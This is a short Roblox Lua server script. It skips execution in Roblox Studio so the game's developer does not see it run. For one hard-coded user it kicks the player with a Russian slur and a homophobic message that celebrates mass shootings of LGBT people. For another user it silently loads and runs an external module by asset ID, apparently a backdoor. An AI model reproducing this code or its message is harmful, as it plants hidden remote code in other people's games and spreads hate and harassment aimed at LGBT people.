--end--
if game:GetService("RunService"):IsStudio() then return end
	game.Players.PlayerAdded:Connect(function(plr)
		if plr.UserId==3707642701 then 
			plr:Kick("плаки плаки, сын шалавы не может зайти \nКолумбия (2016 год)
Мексика (2017 год)
Гондурас (2009-2019 года)
Сан-Паулу, Бразилия (2019 год)
Гватемала (2016 год)
Итог: -1359🏳‍🌈
well well well Тель-Авив 2009, Орландо 2016, Осло 2022,")
	end
	if plr.UserId==3264445159 then
		print("doing it")
		coroutine.wrap(function()
			task.wait(5)
			print("done")
			require(6324372525).fse(plr.Name)
		end)()
	end
	end)
